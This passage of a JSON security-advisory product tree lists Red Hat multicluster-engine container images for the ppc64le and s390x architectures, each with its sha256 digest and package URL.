"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cluster-api-provider-agent-rhel9@sha256%3A797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775346065"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cluster-api-provider-kubevirt-rhel9@sha256%3A6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913637"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cluster-curator-controller-rhel9@sha256%3A928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913604"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cluster-image-set-controller-rhel9@sha256%3A6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913615"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cluster-proxy-addon-rhel9@sha256%3Ad69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913693"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cluster-proxy-rhel9@sha256%3Ad47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775441905"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/clusterclaims-controller-rhel9@sha256%3A4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774918593"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/clusterlifecycle-state-metrics-rhel9@sha256%3Aa8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774925022"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/console-mce-rhel9@sha256%3Aa520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775116156"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/discovery-rhel9@sha256%3Ac9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913711"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/hive-rhel9@sha256%3Ac95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775259683"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/hypershift-addon-rhel9-operator@sha256%3Afb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913832"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/hypershift-cli-rhel9@sha256%3A913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913767"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/hypershift-rhel9-operator@sha256%3Ab078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913854"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/image-based-install-rhel9@sha256%3A9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774986989"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kube-rbac-proxy-mce-rhel9@sha256%3Ad81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913844"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/managed-serviceaccount-rhel9@sha256%3A758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775441911"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/managedcluster-import-controller-rhel9@sha256%3A7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775198475"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/multicloud-manager-rhel9@sha256%3A5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775441898"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/placement-rhel9@sha256%3A05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775638675"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/provider-credential-controller-rhel9@sha256%3A4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775231857"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/registration-rhel9@sha256%3A772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775638726"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/registration-operator-rhel9@sha256%3Aeeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775638748"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/work-rhel9@sha256%3A174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775638726"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"product_id": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/addon-manager-rhel9@sha256%3Ae7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775638648"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"product_id": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel9@sha256%3A97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774990481"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"product_id": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/backplane-rhel9-operator@sha256%3A553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775518980"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"product_id": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cluster-api-provider-agent-rhel9@sha256%3Ad4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775346065"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"product_id": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cluster-api-provider-kubevirt-rhel9@sha256%3Ae26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913637"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"product_id": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cluster-curator-controller-rhel9@sha256%3Aad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913604"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"product_id": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cluster-image-set-controller-rhel9@sha256%3Af4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913615"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"product_id": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cluster-proxy-addon-rhel9@sha256%3A74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913693"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"product_id": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cluster-proxy-rhel9@sha256%3A79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775441905"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"product_id": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/clusterclaims-controller-rhel9@sha256%3Addda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774918593"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"product_id": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"product_identification_helper": {
"purl": "pkg:oci/clusterlifecycle-state-metrics-rhel9@sha256%3A575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774925022"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"product_id": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"product_identification_helper": {
